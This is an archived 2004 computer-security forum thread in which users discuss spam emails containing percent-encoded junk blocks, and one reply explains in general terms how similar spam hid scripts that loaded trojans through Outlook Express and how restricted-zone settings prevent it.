Yet another trojan?

Discussion in 'Computer Security' started by Jim Watt, Oct 3, 2004.

  1. Jim Watt

    Jim Watt Guest

    I've seen a number of messages looking like this, they just get
    deleted, but what exactly are they ? Is this another attempt
    to execute code on MS Outluck?

    --------------------

    - Home directory: The location of the home directory varies by
    platform.
    Windows 98 (single-user): C:\Windows
    Windows 98 (multi-user): C:\Windows\Profiles
    Windows 2000/XP: C:\Documents and Settings




    -----BEGIN BLOCK-----
    F%D5%CDU%C2%058%E5%9A%D5%7D%85
    JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2

    etc ...
    --
    Jim Watt
    http://www.gibnet.com
     
    Jim Watt, Oct 3, 2004
    #1
    1. Advertising

  2. Jim Watt

    Ant Guest

    "Jim Watt" wrote...
    > I've seen a number of messages looking like this,


    So have I - since about the end of August.

    > they just get deleted, but what exactly are they ?


    Just spammer nonsense, I think.

    > Is this another attempt to execute code on MS Outluck?


    The block displays as plain text. I can't make sense of it as
    executable code after escaping.

    I've seen examples of spam containing these blocks, which also contain
    an encoded javascript. This is the real exploit. It contains an iframe
    with a URL to a site hosting a trojan. The idea is that this gets
    silently downloaded and installed if you're unlucky enough to preview
    or open it with OE.

    Easy enough to avoid with the proper security settings. OE should be
    in the restricted zone, which should of course have scripting disabled.

    > - Home directory: The location of the home directory varies by
    > platform.
    > Windows 98 (single-user): C:\Windows
    > Windows 98 (multi-user): C:\Windows\Profiles
    > Windows 2000/XP: C:\Documents and Settings
    >
    > -----BEGIN BLOCK-----
    > F%D5%CDU%C2%058%E5%9A%D5%7D%85
    > JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2
    >
    > etc ...
     
    Ant, Oct 3, 2004
    #2
    1. Advertising

  3. Jim Watt

    Mark3324 Guest

    Googling the first line or first two lines gets quite a few hits. For
    example: http://www.dslreports.com/forum/remark,11298215~start=-1~mode=flat


    On Sun, 3 Oct 2004 12:48:48 -0400, Jim Watt wrote
    (in article <>):

    > I've seen a number of messages looking like this, they just get
    > deleted, but what exactly are they ? Is this another attempt
    > to execute code on MS Outluck?
    >[snipped]
     
    Mark3324, Oct 4, 2004
    #3
  4. Jim Watt

    Ant Guest

    Ant, Oct 4, 2004
    #4
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Merlin Zener

    yet another yEnc question

    Merlin Zener, Jul 18, 2003, in forum: Firefox
    Replies:
    1
    Views:
    1,166
    Roger Vicker, CCP
    Jul 19, 2003
  2. zonkerPro
    Replies:
    2
    Views:
    2,194
    zonkerPro
    Jan 13, 2005
  3. Joel Rubin
    Replies:
    2
    Views:
    709
  4. D@Z
    Replies:
    5
    Views:
    929
    Liza Smorgaborgsson
    Jan 30, 2006
  5. jamesa01
    Replies:
    2
    Views:
    505
    Steve
    Feb 27, 2006
Loading...

Share This Page